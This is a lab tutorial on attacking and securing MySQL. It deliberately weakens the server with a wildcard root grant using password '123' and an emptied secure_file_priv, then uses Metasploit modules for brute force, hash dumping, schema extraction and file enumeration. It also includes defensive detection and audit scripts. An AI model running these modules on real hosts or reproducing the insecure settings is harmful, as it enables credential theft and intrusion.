Penetration Testing on MYSQL (Port 3306)


In this article we will learn to make the MySQL port vulnerable and then secure it, for penetration testing on port 3306. In order to fully understand how to secure a service on a port, you have to understand how to make it vulnerable and then perform penetration testing against it, because if you don't understand what can be exploited and how, you will always fail to secure it.

Table of contents
· Introduction to MySQL-Server
· Installation of MySQL-Server
· Pentesting MySQL-Server

Introduction to MySQL-Server
The core of MySQL is MySQL Server, which handles most of the database instructions. MySQL Server is available as a standalone program for use in a networked client/server environment and as a library that can be embedded (or linked) into separate applications. MySQL ships with several utility programs that support the administration of MySQL databases. Instructions are sent to MySQL Server via the MySQL client, which is installed on a client machine. The server listens on port 3306 by default.

Installation of MySQL-server
The first thing to do is install the MySQL server, using the following command:

apt install mysql-server


Next, use the following command to check whether the server is up and listening:
netstat -tnl


Pentesting MySQL-Server
Scanning MySQL & Connecting to MySQL
Now, as you can see, the MySQL server is running properly. But if you scan the port from another host, it will show as closed.
nmap -p3306 192.168.1.108


The port shows as closed because the server is bound to the local address: a scan from any other IP reports the port closed even though the service is running. This is due to the default setting in the MySQL configuration file, where bind-address is 127.0.0.1, i.e. the port appears open only when scanned from that IP, as shown in the image below. To change this, open the configuration file with the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf


To change this setting, comment out the 'bind-address' line by adding '#' in front of it, as shown in the image below:


Now if you scan it again, the port shows as open.
nmap -p3306 192.168.1.108
However, if you then try to log in through this port, you get an error. This happens because the MySQL server has not granted the root account any privileges for connections coming from other IPs.


This error goes away if you log into the MySQL server and run the following commands, which grant all privileges to the root user when logging in from any IP:
GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123';
FLUSH PRIVILEGES;


Now, when you try to log in, you will succeed, as shown in the image below:


Let's scan the port again with version detection to grab as many details as we can, such as the service banner and MAC address.
nmap -sV -p3306 192.168.1.108


MySQL Brute-Force Attack
One can also brute-force the login with Metasploit. This module simply queries the MySQL instance for a specific user/pass pair. To do so, open a terminal in Kali, type 'msfconsole', and then use the following commands to start the brute-force login:
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit
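From the defender's side, a run of mysql_login leaves a burst of "Access denied" entries in the MySQL error log (logged at [Note] level when log_error_verbosity is 3). The following detection script is an added example, not part of the original article: it parses constructed log lines in that format (assumed, not captured from a real server) and flags any client host that exceeds a threshold of failed logins inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed MySQL 5.7-style error-log lines (not real data): one host cycling
# through several usernames in a few seconds, plus one unrelated failure.
SAMPLE_LOG = """\
2018-03-15T10:22:31.000001Z 12 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2018-03-15T10:22:31.400000Z 13 [Note] Access denied for user 'admin'@'192.168.1.110' (using password: YES)
2018-03-15T10:22:32.100000Z 14 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2018-03-15T10:22:33.000000Z 15 [Note] Access denied for user 'mysql'@'192.168.1.110' (using password: YES)
2018-03-15T10:22:34.000000Z 16 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2018-03-15T10:22:35.000000Z 17 [Note] Access denied for user 'test'@'192.168.1.110' (using password: NO)
2018-03-15T10:40:00.000000Z 40 [Note] Access denied for user 'bob'@'10.0.0.7' (using password: YES)
"""

# timestamp, connection id, level, then the denied user@host pair
DENIED = re.compile(
    r"^(?P<ts>\S+)Z \d+ \[\w+\] Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def parse_denials(text):
    """Yield (timestamp, user, host) for each 'Access denied' line; other lines are ignored."""
    for line in text.splitlines():
        m = DENIED.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["user"], m["host"]

def brute_force_sources(text, threshold=5, window=timedelta(seconds=60)):
    """Return {host: (attempts, distinct_users)} for every client host that produced
    at least `threshold` failed logins inside some sliding `window`."""
    by_host = defaultdict(list)
    for ts, user, host in parse_denials(text):
        by_host[host].append((ts, user))
    flagged = {}
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = {u for _, u in events[start:end + 1]}
                flagged[host] = (end - start + 1, len(users))
    return flagged
```

A single host hitting many distinct usernames is the signature of a wordlist run rather than a user mistyping a password; the distinct-user count is there to tell the two apart.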


Running SQL Queries Without Logging into MySQL
This module allows simple SQL statements to be executed against a MySQL instance, given the appropriate credentials. For this, type:
use auxiliary/admin/mysql/mysql_sql
set rhosts 192.168.1.108
set username root
set password 123
set sql show databases
exploit


Extracting MySQL Schema Information
Our next module extracts the schema information from a MySQL DB server. To use it, type:
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Extracting Login Hashes from MySQL Server
To extract the usernames and password hashes from a MySQL server and store them for later cracking, use the following module:
use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Once the module completes, you can see its result in the file it creates, as shown in the image below:


Checking Writable Directories
Another check that can be run against the MySQL port is to enumerate the directories that are writable. By default this is not possible. If, however, the admin has made the following configuration change, an attacker can check for writable directories.
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then add secure_file_priv="" at the end of the file.


Now, running the following module through Metasploit enumerates writable directories using the MySQL SELECT ... INTO DUMPFILE feature.
use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit


Enumerating Files
To continue pentesting the MySQL port, use the following module to enumerate files and directories using the MySQL load_file feature.
use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit


Changing the Port
Next comes changing the port on which MySQL listens. This is done to reduce exposure to scans and automated attacks aimed at the default port. To change it, open the configuration with the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then change the port number to whichever you prefer. For instance, we have used 4033 here.

After changing the port, a scan shows the MySQL service running on the new port instead of the default one.
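The three configuration changes made in this article (commenting out bind-address, emptying secure_file_priv, and the root@'%' grant) are exactly what an admin should look for when hardening the server, and moving the port does not undo any of them. The following audit script is an added example, not from the original article: it parses constructed mysqld.cnf fragments and constructed user/host rows (all assumed, not taken from a real server) and reports each weakness.

```python
# Constructed mysqld.cnf fragments mirroring the changes made in this article
# (bind-address commented out, secure_file_priv emptied, port moved to 4033); not a real file.
WEAK_CNF = """\
[mysqld]
#bind-address    = 127.0.0.1
port             = 4033
secure_file_priv=""
"""

# The same options restored to the safe values the Debian packaging ships with.
HARDENED_CNF = """\
[mysqld]
bind-address     = 127.0.0.1
port             = 3306
secure_file_priv = /var/lib/mysql-files
"""

# Constructed rows in the shape of SELECT user, host FROM mysql.user after the article's GRANT.
ACCOUNTS = [("root", "localhost"), ("root", "%"), ("app", "10.0.0.5")]
def parse_mysqld_section(text):
    """Return {option: value} for the [mysqld] section, skipping commented-out lines."""
    settings, in_mysqld = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("["):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if in_mysqld and "=" in line:
            key, _, value = line.partition("=")
            # mysqld treats '-' and '_' in option names as the same character
            settings[key.strip().lower().replace("-", "_")] = value.strip().strip("\"'")
    return settings

def audit_mysqld(text):
    """Flag the three weaknesses this article introduces; an empty list means none were found."""
    s, findings = parse_mysqld_section(text), []
    bind = s.get("bind_address")
    if bind is None or bind in ("0.0.0.0", "::", "*"):  # absent means the server default '*'
        findings.append("bind-address: mysqld is listening on every interface")
    if s.get("secure_file_priv") == "":
        findings.append("secure_file_priv: empty string lifts the LOAD_FILE / INTO DUMPFILE path limit")
    if s.get("port", "3306") != "3306":
        findings.append("port %s: non-default, but only bind-address and grants limit who can connect" % s["port"])
    return findings

def wide_open_accounts(rows):
    """Accounts whose host part is '%' may authenticate from any client address."""
    return [(u, h) for u, h in rows if h == "%"]
```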


This is how to both expose and secure a MySQL server.
